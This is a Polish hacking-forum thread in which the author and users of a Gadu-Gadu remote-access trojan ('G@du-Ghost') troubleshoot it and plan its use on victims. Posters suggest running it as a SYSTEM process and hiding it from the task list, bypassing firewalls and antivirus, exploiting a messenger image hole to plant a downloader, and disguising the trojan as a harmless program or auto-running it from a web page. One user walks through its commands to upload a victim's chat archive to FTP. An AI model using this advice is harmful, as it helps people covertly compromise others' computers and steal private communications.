G@du-Ghost Trojan

Status
Zamknięty.

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
www2exe na jednych kompach dzała a na drugich nie dzała, sam dokladnie nie weim dlaczego, bede staral sie ulepszyc ta funkcje w nastepnej wersji
 

mattin

Użytkownik
Dołączył
Maj 30, 2004
Posty
2
Wojass przeczytalem watek i jestem pod wrazeniem- jednak nie darmo polska mysl techniczna w niektorych dziedzinach przewodzi
<

Coz moge powiedziec ? bawie sie tym od paru godzin ( mam w domu 2 komputery i niejako testuje na siostrze
<
) ale musze powiedziec ze idea jest znakomita ;] Jest jednak pare "ale" oraz pytan oraz koncepcji do usprawnienia.Po pierwsze - jako ze jest to program obsługiwany "z palca" czyli linii komend w przypadku pomylki w składni której nie zauwazymy - a przez to program nie wykona komendy - serwer nie odpowiada nam;mozna by zrobic tak aby przy blednie wpisanej komendzie zachowywalo sie to na wzor DOS'a czyli "bad commaand" lub cos w tym stylu. Przykladowo wpisujac komende "ipclg" zamiast"ipcfg" nic nam sie nie wyswietli - nie wiemy wtedy czy cos nie tak po stronie serwa ( czy koles zgasil cos grzebie przy kompie czy jak ) Implementacyjnie to nie bedzie chyba trudne a ułatwi prace z programem
smile.gif

Po drugie: wiadomo ze sukcesem kazdego tego typu programu jest jak najdluzsze utrzymanie sie w systemie bez skapniecia sie uzytkownika.Oczywiscie z naszej strony powinnismy robic wszystko w celu zmaksymalizowania tego czasu.W tym konkretnym przypadku srednio zaawansowany user jak wiemy jest juz na tyle oblatany ze sprawdza czesto liste procesow pod ctrl-alt-del w poszukiwaniu nieproszonych gosci tudzież w celu wylaczenia programow ktore zajmuja mu RAM.Co tez widzi taki user i co wylacza w pierwszej kolejnosci ? Otoz wpierw jak wskazuje praktyka bierze sie za procesy ktore sam założył a nie za procesy systemowe: mowiac po ludzku bardziej podejrzliwym okiem przeglada procesy zalozone przez swoje konto ( czyli siebie) niz "uslugi lokalne" i "system" Jak to mozna wykozystac w naszym celu ? Otoz nadać pracujacemu w tle serwerowi status "system". Dzieki temu taki serwer (ktoremu nadamy przeciez jakas niewzbudzajaca podejrzen nazwe) nie bedzie miał dłuższy okres działania -może i nawet przetrwa do nastepnego formatu :twisted:
Na razie to tyle sugestii ktore moim skromnym zdaniem moglyby podniesc skutecznosc programu ;]

Jeszcze jenda wazna rzecz -w zasadzie moim zdaniam najwazniejsza jesli chodzi o zawabe tym progsem vs. kolesie ktorzy maja ogniomorki: co w przypadku gdy koles ma takowy ? wydaje mi sie ze skoro progs kozysta z serwow gg wiec kozystajac z tych samych portow nie zwraca na siebie uwagi pilnujacych firewalli- ok czyli sprawa rozwiazana jesli chodzi o sprawe portow ; ale firewalle sprawdzaja jeszcze po nazwach plikow i a wtedy taki firewall wykryje ze jakis nowy plik ( czyli nasz serw) probuje cos słac .Dobrze kombinuje ? ;/
uff alem sie rozpisał ;] czekam na płodne wypowiedzi ;d
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
pracuje nad tym mattin,
2 nowe główne funkcje jakie dodam do v1.4 to bedzie ukrywanie procesu pod ctrl+alt+del i firewall bypassing, wersja ta jest juz na ukonczeniu
 

Brenner

Użytkownik
Dołączył
Listopad 7, 2003
Posty
11
Pobawiłem się troche najnowszą wersją (1.3) i zauważyłem:
-Serwer nie reaguje na adresy pików i katalogów zawierających fraze "Tlen"
-nie udało mi się zabić jak narazie żadnych procesów poleceniem kill

www2exe nie tstowałem na tej wersji

Mam małą propozycje:
Serwer GGT powinien umieć odbierać "obrazki". Chodzi mi o wykorzystanie dziury z GG , czyli zamiast wysłania zdjęcia wysłać plik exe. Plik był by zapisywany w jakimś folderze na dysku ofiary. Plik miał by mały razmiar ale wystarczjący na jakiegoś trojan downloadera.
 

Brenner

Użytkownik
Dołączył
Listopad 7, 2003
Posty
11
Hmmm mi się wydaje że norton przeskanuje wysyłanego maila bo monituruje on POP3. Będziesz mieć pewność że nie wyślesz sobie jakiegoś wirusa
<
 

Brenner

Użytkownik
Dołączył
Listopad 7, 2003
Posty
11
GGT v1.3 jest wykrywany przez Mks_Vir jako Trojan.Plimus.13
Teraz to by się naprawde jakaś nowa wersja GGT przydała.

Pytanko:
Ktoś w was wpisywał ścieżki w których była nazwa "Tlen" ??
GGT nie reaguje na tą komęde (ma moim serwerku)
 

mattin

Użytkownik
Dołączył
Maj 30, 2004
Posty
2
stwierdzam nastepujacy problem:
nie dzialaja niektore komendy ( tak tak czekalem dłuuuugo ) ale wciaz nic. Bez problemu dziala np takie "hdd" "ipcfg" "proces" ale juz jak chce mu zgasic GG czyli kill gg.exe to juz nie wylacza sie ( jego status z "dostepny" powinien sie zmienic na "niedostepny" a jokoze tak sie nie dzieje to nie dziala jakby ta komenda. Kto stwierdził jeszcze takie cos ?
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
Originally posted by mattin
stwierdzam nastepujacy problem:
nie dzialaja niektore komendy ( tak tak czekalem dłuuuugo ) ale wciaz nic. Bez problemu dziala np takie "hdd" "ipcfg" "proces" ale juz jak chce mu zgasic GG czyli kill gg.exe to juz nie wylacza sie ( jego status z "dostepny" powinien sie zmienic na "niedostepny" a jokoze tak sie nie dzieje to nie dziala jakby ta komenda. Kto stwierdził jeszcze takie cos ?

pewnie zle wpisujesz komende,
prawidlowo powinno byc:
kill <enter>
gg.exe <enter>
a jak sie nie myle to robisz tak: kill gg.exe <enter> i nie dzała
smile.gif
 

Baron

Użytkownik
Dołączył
Listopad 18, 2003
Posty
12
mam taki problem. Mam chrabke na archiwum gg mojej ofiary ale serwer ftp odpada (jest za NET'em) no i email tez (powyzej 4mb) Macie jakies pomysly?
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
Originally posted by Baron
mam taki problem. Mam chrabke na archiwum gg mojej ofiary ale serwer ftp odpada (jest za NET'em) no i email tez (powyzej 4mb) Macie jakies pomysly?

jak www2exe dzala to zrob update do wersji v1.4 i wtedy mozesz wyslac plik na ftp
 

Duch

Użytkownik
Dołączył
Maj 23, 2003
Posty
31
skanery av na pocztach interi, onetu bo narazie na tych sprawdzalem podczas wysylania serwera spakowanego zipem czy normalnie exe wykrywaja go jako trojana i mail nie zostaje przekazany do odbiorcy
 

Baron

Użytkownik
Dołączył
Listopad 18, 2003
Posty
12
Niestety www2exe nie dziala
ale sprobuje wcisnac nowsza wersje lamie tak jak 1.3 ze niby program do robienia loga na komorke.

Duch---> mailem juz serwera nie wyslesz. Chyba ze z czyms zbindowany ale watpie. Najlepiej umiesc na serwerze albo na stronce i wyslij gosciowi maila z linkiem do niego.
 

Duch

Użytkownik
Dołączył
Maj 23, 2003
Posty
31
Originally posted by Baron
Duch---> mailem juz serwera nie wyslesz. Chyba ze z czyms zbindowany ale watpie. Najlepiej umiesc na serwerze albo na stronce i wyslij gosciowi maila z linkiem do niego.

wlasnie wiem i dam chyba na strone bo raczej innego wyjscia nie widze, dobrze by bylo zeby odpalal sie automatycznie po wejsciu na strone bez pytania
 

Baron

Użytkownik
Dołączył
Listopad 18, 2003
Posty
12
GGT v. 1.4 beta

Mam problem z uploadem plikow na serwer.

klientftp
XXX (jakis numer)
Podaj adres serwera FTP:

YYY (jakis numer)
ftp://[email protected]
14:28:24 YYY (jakis numer)
upload
14:28:24 XXX (jakis numer)
Podaj ścieżkę do pliku:

14:28:29 YYY (jakis numer)
c:/Documents and SettingsXXXGadu-GaduXXXarchives.dat
14:28:29 XXX (jakis numer)
Podaj LOGIN:

14:28:34 YYY (jakis numer)
jakis login
14:28:37 XXX (jakis numer)
Podaj hasło:

14:28:41 XXX (jakis numer)
jakies haslo
14:28:42 YYY (jakis numer)
Podaj port (standart port 21):

14:28:45 XXX (jakis numer)
21
14:28:45 YYY (jakis numer)
Tryb pasywny ? (tak/nie):

14:28:49 XXX (jakis numer)
tak
14:28:51 YYY (jakis numer)
FTP-Status: Resolving hostname c:/Documents and SettingsXXXGadu-GaduXXXarchives.dat.

No i dalej juz nie idzie. A przeciez powinno wysylac co 15s raporty o transferze.
Login i haslo oraz adres serwera sa na pewno dobre.
Jesli u was tez sie tak dzieje albo wiecie dlaczego u mnie sie tak dzieje to dajcie znac
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
<
cos tu namieszales
upload na ftp robisz tak:

1. najpierw funkcja klient ftp
adres serwera ftp podajesz tak : ftp.republika.pl ,a nie tak: ftp://[email protected] ;
nastepnie login haslo etc.

2. jak dostaniesz odpowiedzz ze jestes zalogowany na ftp wtedy funkcja upload i podajesz tylko sciezke do pliku i gotowe
 

Baron

Użytkownik
Dołączył
Listopad 18, 2003
Posty
12
:oops: :oops: :oops:

Robie tak

klientftp
Poadaj adres FTP:
ftp.republika.pl

I dalej sie nic nie dzeje. Jesli zamiast adresu wpisze jakies glupoty to potem sie pyta o login i haslo ale jak wpisze: ftp.republika.pl to juz dalej nie idzie. Mozna by w v 1.5 juz przy generowaniu serwera wprowadzic z jakim serwerem ftp ma sie lanczyc
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
musi sie dac, sprobuj jeszcze raz

klientftp

i jak ggt odpowie :
Podaj adres serwera FTP: - to jest wszystko OK i wtedy podajesz ftp.republika.pl <enter> i jak ggt dostanie ta informacje to musi odpowiedziec Podaj Login: jak tej informacji po chwili nie dostaniesz to wyslij mu jeszcze raz adres serwera ftp, nastepnie podajesz login <enter> i tak dalej , GGT po kazdej otrzymanej informacji od ciebie bedzie przechodzil dalej az polaczy cie z FTP, u mnie dzała na XP bez problemu
 
Status
Zamknięty.
Do góry Bottom